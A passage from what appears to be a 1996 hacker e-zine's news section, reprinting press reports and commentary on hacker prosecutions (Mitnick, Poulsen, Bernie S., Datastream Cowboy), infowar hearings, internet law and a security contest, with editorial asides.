Internet in some way, I think it is not acceptable for somebody else
to undo those efforts," Sobel said. "But what are the alternatives?
Not to pursue this means of communications? Unintended uses and
malicious uses seem to be inevitable."

What's needed, some say, is a fundamental change in the Internet that
forces individual users to "sign" their postings in such a way that
everyone has a unique identity that can't be forged.

[* And how about for the technically challenged who can't figure
   out the point-and-drool America Online software? *]

"The fatal flaw is that newsgroups were set up at a time when
everybody knew everybody using the system, and you could weed out
anybody who did this," Brunton said. "This points out that flaw in the
system, and that there are unreasonable people out there who will
exploit it."

[=-------------------------------------------------------------------------=]

title: Mitnick Faces 25 More Federal Counts of Computer Hacking
source: nando.net - Los Angeles Daily News
   
   LOS ANGELES (Sep 27, 1996 02:06 a.m. EDT) -- A computer hacker who
   used his digital prowess to outrun FBI agents for three years has been
   indicted on charges that he stole millions of dollars in software
   through the Internet.
   
   The 25-count federal indictment against Kevin Mitnick is the biggest
   development in the sensational case since the self-taught computer
   whiz was arrested in February 1995 in North Carolina.
   
   The 33-year-old son of a waitress from suburban Los Angeles has been
   held in custody in Los Angeles ever since.
   
   With Thursday's indictment, federal prosecutors made good on their vow
   to hold Mitnick accountable for what they say was a string of hacking
   crimes that pushed him to the top of the FBI's most-wanted list.
   
   "These are incredibly substantial charges. They involve conducts
   spanning two and a half years. They involve a systematic scheme to
   steal proprietary software from a range of victims," Assistant U.S.
   Attorney David Schindler said in an interview.
   
   Mitnick's longtime friend, Lewis De Payne, 36, also was indicted
   Thursday on charges that he helped steal the software between June
   1992 and February 1995 -- while Mitnick was on the run from the FBI.
   
   "I would say it is an absurd fiction," said De Payne's attorney,
   Richard Sherman. "I don't think the government is going to be able to
   prove its case."
   
   De Payne will surrender today to authorities in Los Angeles, Sherman
   said.
   
   Friends and relatives of Mitnick have defended his hacking, saying he
   did it for the intellectual challenge and to pull pranks -- but never
   for profit.
   
   Los Angeles' top federal prosecutor sees it differently.
   
   "Computer and Internet crime represents a major threat, with
   sophisticated criminals able to wreak havoc around the world," U.S.
   Attorney Nora M. Manella said in a written statement.
   
   The indictment charges Mitnick and De Payne with having impersonated
   officials from companies and using "hacking" programs to enter company
   computers. Schindler said the software involved the operation of
   cellular telephones and computer operating systems.
   
   Their alleged victims include the University of Southern California,
   Novell, Sun Microsystems and Motorola, Schindler said.

[=-------------------------------------------------------------------------=]

title: Hacker is freed but he's banned from computers
author: Brandon Bailey (Mercury News Staff Writer)

Convicted hacker Kevin Poulsen is out of prison after five years, but
he still can't touch a computer.

Facing a court order to pay more than $57,000 in restitution for
rigging a series of radio station call-in contests, Poulsen has
complained that authorities won't let him use his only marketable
skill -- programming.

Instead, Poulsen said, he's doomed to work for minimum wage at a
low-tech job for the next three years. Since his June release from
prison -- after serving more time behind bars than any other
U.S. hacker -- the only work he's found is canvassing door to door for
a liberal political action group.

It's a big change for the 30-year-old Poulsen, once among the most
notorious hackers on the West Coast. A former employee at SRI
International in Menlo Park, he was featured on television's
"America's Most Wanted" while living underground in Los Angeles as a
federal fugitive from 1989 to 1991.

Before authorities caught him, Poulsen burglarized telephone company
offices, electronically snooped through records of law enforcement
wiretaps and jammed radio station phone lines in a scheme to win cash,
sports cars and a trip to Hawaii.

Poulsen now lives with his sister in the Los Angeles area, where he
grew up in the 1970s and '80s. But he must remain under official
supervision for three more years. And it galls him that authorities
won't trust him with a keyboard or a mouse.

U.S. District Judge Manuel Real has forbidden Poulsen to have any
access to a computer without his probation officer's approval.

That's a crippling restriction in a society so reliant on computer
technology, Poulsen complained in a telephone interview after a
hearing last week in which the judge denied Poulsen's request to
modify his terms of probation.

To comply with those rules, Poulsen said, his parents had to put their
home computer in storage when he stayed with them. He can't use an
electronic card catalog at the public library. And he relies on
friends to maintain his World Wide Web site. He even asked his
probation officer whether it was OK to drive because most cars contain
microchips.

Living under government supervision apparently hasn't dampened the
acerbic wit Poulsen displayed over the years.

Prankster humor

When authorities were tracking him, they found he'd kept photographs
of himself, taken while burglarizing phone company offices, and that
he'd created bogus identities in the names of favorite comic book
characters.

Today, you can click on Poulsen's web page (http://www.catalog.com/kevin) 
and read his account of his troubles with the law. Until it was
revised Friday, you could click on the highlighted words "my probation
officer" -- and see the scary red face of Satan.

But though he's still chafing at authority, Poulsen insists he's ready
to be a law-abiding citizen.

"The important thing to me," he said, "is just not wasting the next
three years of my life." He said he's submitted nearly 70 job
applications but has found work only with the political group, which
he declined to identify.

Poulsen, who earned his high school diploma behind bars, said he wants
to get a college degree. But authorities vetoed his plans to study
computer science while working part-time because they want him to put
first priority on earning money for restitution.

Poulsen's federal probation officer, Marc Stein, said office policy
prevents him from commenting on the case. Poulsen's court-appointed
attorney, Michael Brennan, also declined comment.

Differing view

But Assistant U.S. Attorney David Schindler partly disputed Poulsen's
account.

"Nobody wants to see Mr. Poulsen fail," said Schindler, who has
prosecuted both Poulsen and Kevin Mitnick, another young man from the
San Fernando Valley whose interest in computers and telephones became
a passion that led to federal charges.

Schindler said Stein is simply being prudent: "It would be irresponsible 
for the probation office to permit him to have unfettered access to
computers."

Legal experts say there's precedent for restricting a hacker's access
to computers, just as paroled felons may be ordered not to possess
burglary tools or firearms. Still, some say it's going too far.

"There are so many benign things one can do with a computer," said
Charles Marson, a former attorney for the American Civil Liberties
Union who handles high-tech cases in private practice. "If it were a
typewriter and he pulled some scam with it or wrote a threatening
note, would you condition his probation on not using a typewriter?"

But Carey Heckman, co-director of the Law and Technology Policy Center
at Stanford University, suggested another analogy: "Would you want to
put an arsonist to work in a match factory?"

Friends defend Poulsen.

Over the years, Poulsen's friends and defense lawyers have argued that
prosecutors exaggerated the threat he posed, either because law
officers didn't understand the technology he was using or because his
actions seemed to flaunt authority.

Hacking is "sort of a youthful rebellion thing," Poulsen says
now. "I'm far too old to get back into that stuff."

But others who've followed Poulsen's career note that he had earlier
chances to reform.

He was first busted for hacking into university and government
computers as a teen-ager. While an older accomplice went to jail,
Poulsen was offered a job working with computers at SRI, the private
think tank that does consulting for the Defense Department and other
clients.

There, Poulsen embarked on a double life: A legitimate programmer by
day, he began breaking into Pacific Bell offices and hacking into
phone company computers at night.

When he learned FBI agents were on his trail, he used his skills to
track their moves.

Before going underground in 1989, he also obtained records of secret
wiretaps from unrelated investigations. Though Poulsen said he never
tipped off the targets, authorities said they had to take steps to
ensure those cases weren't compromised.

According to Schindler, the probation office will consider Poulsen's
requests to use computers "on a case-by-case basis."

[=-------------------------------------------------------------------------=]

[* Blurb on Bernie's release follows this article. *]

title: Computer Hacker Severely Beaten after Criticizing Prison Conditions
       Target of Campaign by U.S. Secret Service

A convicted hacker, in prison for nothing more than possession of
electronic parts easily obtainable at any Radio Shack, has been
savagely beaten after being transferred to a maximum security prison
as punishment for speaking out publicly about prison conditions.
Ed Cummings, recently published in Wired and Internet Underground, as
well as a correspondent for WBAI-FM in New York and 2600 Magazine,
has been the focus of an increasingly ugly campaign of harrassment
and terror from the authorities. At the time of this writing, Cummings
is locked in the infectious diseases ward at Lehigh County prison in
Allentown, Pennsylvania, unable to obtain the proper medical treatment
for the severe injuries he has suffered.

The Ed Cummings case has been widely publicized in the computer hacker
community over the past 18 months. In March of 1995, in what can only
be described as a bizarre application of justice, Cummings (whose pen
name is "Bernie S.") was targetted and imprisoned by the United States
Secret Service for mere possession of technology that could be used to
make free phone calls. Although the prosecution agreed there was no
unauthorized access, no victims, no fraud, and no costs associated with
the case, Cummings was imprisoned under a little known attachment to the
Digital Telephony bill allowing individuals to be charged in this fashion.
Cummings was portrayed by the Secret Service as a potential terrorist
because of some of the books found in his library.

A year and a half later, Cummings is still in prison, despite the
fact that he became eligible for parole three months ago. But things have
now taken a sudden violent turn for the worse. As apparent retribution for
Cummings' continued outspokenness against the daily harrassment and
numerous injustices that he has faced, he was transferred on Friday
to Lehigh County Prison, a dangerous maximum security facility. Being
placed in this facility was in direct opposition to his sentencing
order. The reason given by the prison: "protective custody".

A day later, Cummings was nearly killed by a dangerous inmate for not
getting off the phone fast enough. By the time the prison guards stopped
the attack, Cummings had been kicked in the face so many times that he
lost his front teeth and had his jaw shattered. His arm, which he tried
to use to shield his face, was also severely injured. It is expected that
his mouth will be wired shut for up to three months. Effectively,
Cummings has now been silenced at last.

>From the start of this ordeal, Cummings has always maintained his
composure and confidence that one day the injustice of his
imprisonment will be realized. He was a weekly contributor to a
radio talk show in New York where he not only updated listeners on
his experiences, but answered their questions about technology.
People from as far away as Bosnia and China wrote to him, having
heard about his story over the Internet.

Now we are left to piece these events together and to find those
responsible for what are now criminal actions against him. We are
demanding answers to these questions: Why was Cummings transferred
for no apparent reason from a minimum security facility to a very
dangerous prison? Why has he been removed from the hospital immediately
after surgery and placed in the infectious diseases ward of the very
same prison, receiving barely any desperately needed medical
attention? Why was virtually every moment of Cummings' prison stay a
continuous episode of harrassment, where he was severely punished for
such crimes as receiving a fax (without his knowledge) or having too
much reading material? Why did the Secret Service do everything in
their power to ruin Ed Cummings' life?

Had these events occurred elsewhere in the world, we would be quick
to condemn them as barbaric and obscene. The fact that such things are
taking place in our own back yards should not blind us to the fact that
they are just as unacceptable.

Lehigh County Prison will be the site of several protest actions as will
the Philadelphia office of the United States Secret Service. For more
information on this, email protest@2600.com or call our office at
(516) 751-2600.

9/4/96

[=-------------------------------------------------------------------------=]

title: Bernie S. Released!

As of Friday, September 13th, Bernie S. was released from prison on
an unprecedented furlough. He will have to report to probation and
he still has major medical problems as a result of his extended tour
of the Pennsylvania prison system. But the important thing is that
he is out and that this horrible ordeal has finally begun to end.

We thank all of you who took an interest in this case. We believe
it was your support and the pressure you put on the authorities that
finally made things change. Thanks again and never forget the power
you have.

emmanuel@2600.com
www.2600.com

[=-------------------------------------------------------------------------=]

title: <The Squidge Busted>

ENGLAND:

The Squidge was arrested at his home yesterday under the Computer Misuse
Act. A long standing member of the US group the *Guild, Squidge was silent
today after being released but it appears no formal charges will be made
until further interviews have taken place.

Included in the arrest were the confiscation of his computer equipment
including two Linux boxes and a Sun Sparc. A number of items described as
'telecommunications devices' were also seized as evidence.

Following the rumours of ColdFire's recent re-arrest for cellular fraud
this could mean a new crackdown on hacking and phreaking by the UK
authorities. If this is true, it could spell the end for a particularly
open period in h/p history when notable figures have been willing to
appear more in public.

We will attempt to release more information as it becomes available.

(not posted by Squidge)

--
    Brought to you by The NeXus.....

[* Good luck goes out to Squidge.. we are hoping for the best. *]

[=-------------------------------------------------------------------------=]

title: School Hires Student to Hack Into Computers
source: The Sun Herald - 22 August 1996

     Palisades Park, NJ - When in trouble, call an expert.

     Students at Palisades Park's high school needed their
transcripts to send off to colleges.  But they were in the computer
and no one who knew the password could be reached.  So the school
hired a 16-year-old hacker to break in.

     "They found this student who apparently was a whiz, and,
apparently, was able to go in and unlock the password," School Board
attorney Joseph R. Mariniello said.

     Superintendent George Fasciano was forced to explain to the
School Board on Monday the $875 bill for the services of Matthew
Fielder.

[* He should have charged more :) *]

[=-------------------------------------------------------------------------=]

title: Paranoia and Brit Hackers Fuel Infowar Craze in Spy Agencies
author: unknown
source: Crypt Newsletter 38 

Electronic doom will soon be visited on U.S. computer networks by
information warriors, hackers, pannational groups of computer-wielding
religious extremists, possible agents of Libya and Iran, international
thugs and money-mad Internet savvy thieves.

John Deutch, director of Central Intelligence, testified to the
truth of the matter, so it must be graven in stone. In a long statement
composed in the august tone of the Cold Warrior, Deutch said to the
Senate Permanent Subcommittee on Investigations on June 25, "My greatest
concern is that hackers, terrorist organizations, or other nations might
use information warfare techniques" to disrupt the national
infrastructure.

"Virtually any 'bad actor' can acquire the hardware and software
needed to attack some of our critical information-based infrastructures.
Hacker tools are readily available on the Internet, and hackers
themselves are a source of expertise for any nation or foreign
terrorist organization that is interested in developing an information
warfare capability. In fact, hackers, with or without their full
knowledge, may be supplying advice and expertise to rogue states such
as Iran and Libya."

In one sentence, the head of the CIA cast hackers -- from those more
expert than Kevin Mitnick to AOLHell-wielding idiots calling an America
On-Line overseas account -- as pawns of perennial international bogeymen,
Libya and Iran.

Scrutiny of the evidence that led to this conclusion was not possible
since it was classified, according to Deutch.

" . . . we have [classified] evidence that a number of countries
around the world are developing the doctrine, strategies, and tools
to conduct information attacks," said Deutch.

Catching glimpses of shadowy enemies at every turn, Deutch
characterized them as operating from the deep cover of classified
programs in pariah states.  Truck bombs aimed at the telephone
company, electronic assaults by "paid hackers" are likely to
be part of the arsenal of anyone from the Lebanese Hezbollah
to "nameless . . . cells of international terrorists such as those
who attacked the World Trade Center."

Quite interestingly, a Minority Staff Report entitled "Security and
Cyberspace" and presented to the subcommittee around the same time as
Deutch's statement, presented a different picture.  In its attempt to
raise the alarm over hacker assaults on the U.S., it inadvertently
portrayed the intelligence community responsible for appraising the
threat as hidebound stumblebums, Cold Warriors resistant to change and
ignorant or indifferent to the technology of computer networks and their
misuse.

Written by Congressional staff investigators Dan Gelber and Jim Christy,
the report quotes an unnamed member of the intelligence  community likening
threat assessment in the area to "a toddler soccer game, where everyone
just runs around trying to kick the ball somewhere."  Further, assessment
of the threat posed by information warriors was "not presently a priority
of our nation's intelligence and enforcement communities."

The report becomes more comical with briefings from intelligence
agencies said to be claiming that the threat of hackers and information
warfare is "substantial" but completely unable to provide a concrete
assessment of the threat because few or no personnel were working on
the subject under investigation. "One agency assembled [ten] individuals
for the Staff briefing, but ultimately admitted that only one person was
actually working 'full time' on intelligence collection and threat
analysis," write Gelber and Christy.

The CIA is one example.

"Central Intelligence Agency . . . staffs an 'Information Warfare
Center'; however, at the time of [the] briefing, barely a handful
of persons were dedicated to collection and on [sic] defensive
information warfare," comment the authors.

" . . . at no time was any agency able to present a national threat
assessment of the risk posed to our information infrastructure," they
continue. Briefings on the subject, if any and at any level of
classification, "consisted of extremely limited anecdotal information."

Oh no, John, say it ain't so!

The minority report continues to paint a picture of intelligence agencies
that have glommed onto the magic words "information warfare" and
"hackers" as mystical totems, grafting the subjects onto "pre-existing"
offices or new "working groups." However, the operations are based only
on labels. "Very little prioritization" has been done, there are
few analysts working on the subjects in question.

Another "very senior intelligence officer for science and technology"
is quoted claiming "it will probably take the intelligence community
years to break the traditional paradigms, and re-focus resources"
in the area.

Restated, intelligence director Deutch pronounced in June there was
classified evidence that hackers are in league with Libya and Iran and
that countries around the world are plotting plots to attack the U.S.
through information warfare.  But the classified data is and was, at best,
anecdotal gossip -- hearsay, bullshit -- assembled by perhaps a handful of
individuals working haphazardly inside the labyrinth of the intelligence
community. There is no real threat assessment to back up the Deutch
claims.  Can anyone say _bomber gap_?

The lack of solid evidence for any of the claims made by the intelligence
community has created an unusual stage on which two British hackers,
Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous
show to demonstrate the threat of information warfare to members of
Congress.  Because of a break-in at an Air Force facility in Rome, NY,
in 1994, booth hackers were made the stars of two Government Accounting
Office reports on network intrusions in the Department of Defense earlier
this year.  The comings and goings of Datastream Cowboy also constitute the
meat of Gelber and Christy's minority staff report from the Subcommittee on
Investigations.

Before delving into it in detail, it's interesting to read what a
British newspaper published about Datastream Cowboy, a sixteen year-old,
about a year before he was made the poster boy for information
warfare and international hacking conspiracies in front of Congress.

In a brief article, blessedly so in contrast to the reams of propaganda
published on the incident for Congress, the July 5 1995 edition of The
Independent wrote, "[Datastream Cowboy] appeared before Bow Street
magistrates yesterday charged with unlawfully gaining access to a series
of American defense computers. Richard Pryce, who was 16 at the time of
the alleged offences, is accused of accessing key US Air Force systems
and a network owned by Lockheed, the missile and aircraft manufacturers."

Pryce, a resident of a northwest suburb of London did not enter a plea
on any of 12 charges levied against him under the British
Computer Misuse Act.  He was arrested on May 12, 1994, by New Scotland
Yard as a result of work by the U.S. Air Force Office of Special
Investigations.  The Times of London reported when police came for
Pryce, they found him at his PC on the third floor of his family's house.
Knowing he was about to be arrested, he "curled up on the floor and cried."

In Gelber and Christy's staff report, the tracking of Pryce, and to a
lesser extent a collaborator called Kuji -- real name Mathew Bevan, is
retold as an eight page appendix entitled "The Case Study: Rome
Laboratory, Griffiss Air Force Base, NY Intrusion."

Pryce's entry into Air Force computers was noticed on March 28, 1994,
when personnel discovered a sniffer program he had installed on one
of the Air Force systems in Rome.  The Defense Information System
Agency (DISA) was notified.  DISA subsequently called the Air
Force Office of Special Investigations (AFOSI) at the Air Force
Information Warfare Center in San Antonio, Texas. AFOSI then
sent a team to Rome to appraise the break-in, secure the system and
trace those responsible.  During the process, the AFOSI team discovered
Datastream Cowboy had entered the Rome Air Force computers for the
first time on March 25, according to the report.  Passwords had been
compromised, electronic mail read and deleted and unclassified
"battlefield simulation" data copied off the facility. The
Rome network was also used as a staging area for penetration of other
systems on the Internet.

AFOSI investigators initially traced the break-in back one step to
the New York City provider, Mindvox. According to the Congressional
report, this put the NYC provider under suspicion because "newspaper
articles" said Mindvox's computer security was furnished by two "former
Legion of Doom members." "The Legion of Doom is a loose-knit computer
hacker group which had several members convicted for intrusions into
corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.

AFOSI then got permission to begin monitoring -- the equivalent of
wiretapping -- all communications on the Air Force network.  Limited
observation of other Internet providers being used during the break-in
was conducted from the Rome facilities.  Monitoring told the investigators
the handles of hackers involved in the Rome break-in were Datastream
Cowboy and Kuji.

Since the monitoring was of limited value in determining the whereabouts
of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence
network of informants, i.e., stool pigeons, that 'surf the Internet.'
Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from
Britain. The anonymous source said he had e-mail correspondence with
Datastream Cowboy in which the hacker said he was a 16-year old living in
England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also
apparently ran a bulletin board system and gave the telephone number to the
AFOSI source.

The Air Force team contacted New Scotland Yard and the British law
enforcement agency identified the residence, the home of Richard
Pryce, which corresponded to Datastream Cowboy's system phone number.
English authorities began observing Pryce's phone calls and noticed
he was making fraudulent use of British Telecom.  In addition,
whenever intrusions at the Air Force network in Rome occurred, Pryce's
number was seen to be making illegal calls out of Britain.

Pryce travelled everywhere on the Internet, going through South America,
multiple countries in Europe and Mexico, occasionally entering the Rome
network.  From Air Force computers, he would enter systems at Jet
Propulsion Laboratory in Pasadena, California, and the Goddard Space
Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins
and passwords of the Air Force networks in Rome, he was then able to
get into the home systems of Rome network users, defense contractors
like Lockheed.

By mid-April of 1994 the Air Force was monitoring other systems being
used by the British hackers. On the 14th of the month, Kuji logged on
to the Goddard Space Center from a system in Latvia and copied data
from it to the Baltic country.  According to Gelber's report, the
AFOSI investigators assumed the worst, that it was a sign that someone
in an eastern European country was making a grab for sensitive
information.  They broke the connection but not before Kuji had
copied files off the Goddard system.  As it turned out, the Latvian
computer was just another system the British hackers were using as
a stepping stone; Pryce had also used it to cover his tracks when
penetrating networks at Wright-Patterson Air Force Base in Ohio, via
an intermediate system in Seattle, cyberspace.com.

The next day, Kuji was again observed trying to probe various
systems at NATO in Brussels and The Hague as well as Wright-Patterson.
On the 19th, Pryce successfully returned to NATO systems in The
Hague through Mindvox.  The point Gelber and Christy seem to be trying
to make is that Kuji, a 21-year old, was coaching Pryce during some
of his attacks on various systems.

By this point, New Scotland Yard had a search warrant for Pryce
with the plan being to swoop down on him the next time he accessed
the Air Force network in Rome.

In April, Pryce penetrated a system on the Korean peninsula and copied
material off a facility called the Korean Atomic Research Institute
to an Air Force computer in Rome. At the time, the investigators had
no idea whether the system was in North or South Korea.  The impression
created is one of hysteria and confusion at Rome. There was fear that the
system, if in North Korea, would trigger an international incident, with
the hack interpreted as an "aggressive act of war." The system turned
out to be in South Korea.

During the Korean break-in, New Scotland Yard could have intervened and
arrested Pryce.  However, for unknown reasons, the agency did not.  Those
with good memories may recall mainstream news reports concerning Pryce's
hack, which was cast as an entry into sensitive North Korean networks.

It's worth noting that while the story was portrayed as the work of
an anonymous hacker, both the U.S. government and New Scotland Yard knew
who the perpetrator was.  Further, according to Gelber's report English
authorities already had a search warrant for Pryce's house.

Finally, on May 12 British authorities pounced.  Pryce was arrested
and his residence searched.  He crumbled, according to the Times of
London, and began to cry.  Gelber and Christy write that Pryce promptly
admitted to the Air Force break-ins as well as others.  Pryce
confessed he had copied a large program that used artificial intelligence
to construct theoretical Air Orders of Battle from an Air Force computer
to Mindvox and left it there because of its great size, 3-4 megabytes.
Pryce paid for his Internet service with a fraudulent credit card number.
At the time, the investigators were unable to find out the name and
whereabouts of Kuji. A lead to an Australian underground bulletin board
system failed to pan out.

On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew
Bevan -- a computer technician, had been arrested and charged in
connection with the 1994 Air Force break-ins in Rome.

Rocker Tom Petty sang that even the losers get lucky some time.  He
wasn't thinking of British computer hackers but no better words could be
used to describe the two Englishmen and a two year old chain of events that
led to fame as international computer terrorists in front of Congress
at the beginning of the summer of 1996.

Lacking much evidence for the case of conspiratorial computer-waged
campaigns of terror and chaos against the U.S., the makers of Congressional
reports resorted to telling the same story over and over, three
times in the space of the hearings on the subject. One envisions U.S.
Congressmen too stupid or apathetic to complain, "Hey, didn't we get that
yesterday, and the day before?" Pryce and Bevan appeared in "Security in
Cyberspace" and twice in Government Accounting Office reports AIMD-96-84
and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace"
and the Air Force Office of Special Investigations' source for the Pryce
case supplied the same tale for Jack Brock, author of the GAO reports.
Brock writes, ". . . Air Force officials told us that at least one of
the hackers may have been working for a foreign country interested in
obtaining military research data or areas in which the Air Force was
conducting advanced research."  It was, apparently, more wishful
thinking.


Notes:

The FAS Web site also features an easy to use search engine which can
be used to pull up the Congressional testimony on hackers and
network intrusion.  These example key words are effective: "Jim
Christy," "Datastream Cowboy".

[=-------------------------------------------------------------------------=]

title: Hackers Find Cheap Scotland Yard Phone Connection
source: Reuters/Variety

Monday August 5 12:01 AM EDT

LONDON (Reuter) - Computer hackers broke into a security system at
Scotland Yard, London's metropolitan police headquarters, to make
international calls at police expense, police said Sunday.

A police spokesman would not confirm a report in the Times newspaper
that the calls totaled one million pounds ($1.5 million). He said
the main computer network remained secure.

"There is no question of any police information being accessed," the
spokesman said. "This was an incident which was investigated by our
fraud squad and by AT&T investigators in the U.S."

AT&T Corp investigators were involved because most of the calls were
to the United States, the Times said.

According to The Times, the hackers made use of a system called PBX
call forwarding that lets employees to make business calls from home
at their employer's expense.

[=-------------------------------------------------------------------------=]

title: U.S. Official Warns OF "Electronic Pearl Harbor"
source: BNA Daily Report - 17 Jul 96

Deputy U.S. Attorney General Jamie Gorelick told a Senate
subcommittee last week that the possibility of "an electronic Pearl
Harbor" is a very real danger for the U.S.  She noted in her
testimony that the U.S. information infrastructure is a hybrid
public/private network, and warned that electronic attacks "can
disable or disrupt the provision of services just as readily as --
if not more than -- a well-placed bomb."  On July 15 the Clinton
Administration called for a President's Commission on Critical
Infrastructure Protection, with the mandate to identify the nature
of threats to U.S. infrastructure, both electronic and physical, and
to work with the private sector in devising a strategy for
protecting this infrastructure.  At an earlier hearing, subcommittee
members were told that about 250,000 intrusions into Defense
Department computer systems are attempted each year, with about a
65% success rate.

[=-------------------------------------------------------------------------=]

title: Suit Challenges State's Restraint of the Internet Via AP
author: Jared Sandberg
source: The Wall Street Journal

Can the state of Georgia hold sway over the global Internet?

A federal lawsuit filed against the state Tuesday by the American
Civil Liberties Union should eventually answer that question. The
suit, filed in federal district court in Georgia, challenges a new
Georgia law that makes it illegal in some instances to communicate
anonymously on the Internet and to use trademarks and logos without
permission.

The ACLU, joined by 13 plaintiffs including an array of public-
interest groups, contends that the Georgia law is "unconstitutionally
vague" and that its restraints on using corporate logos and trade
names are "impermissibly chilling constitutionally protected
expression." The plaintiffs also argue that the Georgia law, which
imposes a penalty of up to 12 months in jail and $1,000 in fines,
illegally tries to impose state restrictions on interstate commerce, a
right reserved for Congress.

The legal challenge is one of the first major assaults on state laws
that seek to rein in the Internet, despite its global reach and
audience. Since the beginning of 1995, 11 state legislatures have
passed Internet statutes and nine others have considered taking
action.

Connecticut passed a law last year that makes it a crime to send an
electronic-mail message "with intent to harass, annoy or alarm another
person" -- despite the Internet's hallowed tradition of "flaming"
users with messages designed to do just that. Virginia enacted a bill
this year making it illegal for a state employee -- including
professors who supposedly have academic freedom on state campuses --
to use state-owned computers to get access to sexually explicit
material. New York state has tried to resurrect prohibitions on
"indecent material" that were struck down as unconstitutional by a
federal appeals panel ruling on the federal Communications Decency Act
three months ago.

Most Internet laws target child pornographers and stalkers. Opponents
argue the well-intended efforts could nonetheless chill free speech
and the development of electronic commerce. They maintain that the
Internet, which reaches into more than 150 countries, shouldn't be
governed by state laws that could result in hundreds of different, and
often conflicting, regulations.

"We've got to nip this in the bud and have a court declare that states
can't regulate the Internet because it would damage interstate
commerce," says Ann Beeson, staff attorney for the ACLU. "Even though
it's a Georgia statute, it unconstitutionally restricts the ability of
anybody on the Internet to use a pseudonym or to link to a Web page
that contains a trade name or logo. It is unconstitutional on its
face."

Esther Dyson, president of high-tech publisher EDventure Holdings
Inc. and chairwoman of the Electronic Frontier Foundation, a high-tech
civil liberties organization that is a co-plaintiff in the lawsuit,
calls the Georgia law "brain-damaged and unenforceable" and adds: "How
are they going to stop people from using fake names? Anonymity
shouldn't be a crime. Committing crimes should be a crime."

But Don Parsons, the Republican state representative who sponsored the
Georgia bill, countered that the law is a necessary weapon to combat
fraud, forgery and other on-line misdeeds. The groups that oppose it,
he says, "want to present (the Internet) as something magical, as
something above and beyond political boundaries." It is none of these
things, he adds.

Nor does the Georgia law seek to ban all anonymity, Mr. Parsons says;
instead, it targets people who "fraudulently misrepresent their (Web)
site as that of another organization." Misrepresenting on-line medical
information, for example, could cause serious harm to an unsuspecting
user, he says.

But Mr. Parsons's critics, including a rival state lawmaker,
Rep. Mitchell Kaye, say political reprisal lies behind the new
law. They say Mr. Parsons and his political allies were upset by the
Web site run by Mr. Kaye, which displayed the state seal on its
opening page and provided voting records and sometimes harsh political
commentary. Mr. Kaye asserts that his Web site prompted the new law's
attack on logos and trademarks that are used without explicit
permission.

"We've chosen to regulate free speech in the same manner that
communist China, North Korea, Cuba and Singapore have," Mr. Kaye
says. "Legislators' lack of understanding has turned to fear. It has
given Georgia a black eye and sent a message to the world -- that we
don't understand and are inhospitable to technology."

Mr. Parsons denies that the political Web site was the primary reason
for his sponsorship of the new statute.

The very local dispute underscores the difficulty of trying to
legislate behavior on the Internet. "It creates chaos because I don't
know what rules are going to apply to me," says Lewis Clayton, a
partner at New York law firm Paul, Weiss, Rifkind, Wharton &
Garrison. "Whose laws are going to govern commercial transactions? You
don't want to have every different state with the ability to regulate
what is national or international commerce."

In the case of the Georgia statute, while its backers say it isn't a
blanket ban of anonymity, opponents fear differing interpretations of
the law could lead to the prosecution of AIDS patients and childabuse
survivors who use anonymity to ensure privacy when they convene on the
Internet.

"Being able to access these resources anonymously really is crucial,"
says Jeffery Graham, executive director of the AIDS Survival Project,
an Atlanta service that joined the ACLU in the lawsuit. His group's
members "live in small communities," he says, and if their identities
were known, "they would definitely suffer from stigmas and reprisals."

[=-------------------------------------------------------------------------=]

title: U.S. Government Plans Computer Emergency Response Team
source: Chronicle of Higher Education - 5 Jul 96

The federal government is planning a centralized emergency response team to
respond to attacks on the U.S. information infrastructure.  The Computer
Emergency Response Team at Carnegie Mellon University, which is financed
through the Defense Department, will play a major role in developing the new
interagency group, which will handle security concerns related to the
Internet, the telephone system, electronic banking systems, and the
computerized systems that operate the country's oil pipelines and electrical
power grids. 

[=-------------------------------------------------------------------------=]

title: Hackers $50K challenge to break Net security system
source: Online Business Today

World Star Holdings in Winnipeg, Canada is looking for
trouble. If they find it, they're willing to pay $50,000 to the
first person who can break their security system. The
company has issued an open invitation to take the "World
Star Cybertest '96: The Ultimate Internet Security Challenge,"
in order to demonstrate the Company's Internet security
system.

Personal email challenges have been sent to high profile
names such as Bill Gates, Ken Rowe at the National Center
for Super Computing, Dr. Paul Penfield, Department of
Computer Science at the M.I.T. School of Engineering and
researchers Drew Dean and Dean Wallach of Princeton
University.

[* Challenging Bill Gates to hack a security system is like
   challenging Voyager to a knitting contest. *]

OBT's paid subscription newsletter Online Business
Consultant has recently quoted the Princeton team in several
Java security reports including "Deadly Black Widow On The
Web: Her Name is JAVA," "Java Black Widows---Sun
Declares War," Be Afraid. Be Very Afraid" and "The
Business Assassin."  To read these reports go to Home Page
Press http://www.hpp.com and scroll down the front page.

Brian Greenberg, President of World Star said, "I personally
signed, sealed and emailed the invitations and am very
anxious to see some of the individuals respond to the
challenge. I am confident that our system is, at this time, the
most secure in cyberspace."

World Star Holdings, Ltd., is a provider of interactive
"transactable" Internet services and Internet security
technology which Greenberg claims has been proven
impenetrable. The Company launched its online contest
offering more than $50,000 in cash and prizes to the first
person able to break its security system.

According to the test's scenario hackers are enticed into a
virtual bank interior in search of a vault. The challenge is to
unlock it and find a list of prizes with inventory numbers and
a hidden "cyberkey" number.  OBT staff used Home Page
Press's Go.Fetch (beta) personal agent software to retrieve the
World Star site and was returned only five pages.

If you're successful, call World Star at 204-943-2256.  Get to
it hackers.  Bust into World Star at http://205.200.247.10 to
get the cash!

[=-------------------------------------------------------------------------=]

title: Criminal cult begins PGP crack attempt
from: grady@netcom.com (Grady Ward)

The Special Master has informed me that Madame Kobrin has asked
her to retain a PC expert to attempt to "crack" a series of
pgp-encrypted multi-megabyte files that were seized along with
more than a compressed gigabyte of other material from my safety
deposit box.

Ironically, they phoned to ask for assistance in supplying them
with a prototype "crack" program that they could use in iterating
and permuting possibilities. I did supply them a good core
pgpcrack source that can search several tens of thousands of
possible key phrases a seconds; I also suggested that they should
at least be using a P6-200 workstation or better to make the
search more efficient.

The undercurrent is that this fresh hysterical attempt to "get"
something on me coupled with the daily settlement pleas reflects
the hopelessness of the litigation position of the criminal cult.

It looks like the criminal cult has cast the die to ensure that
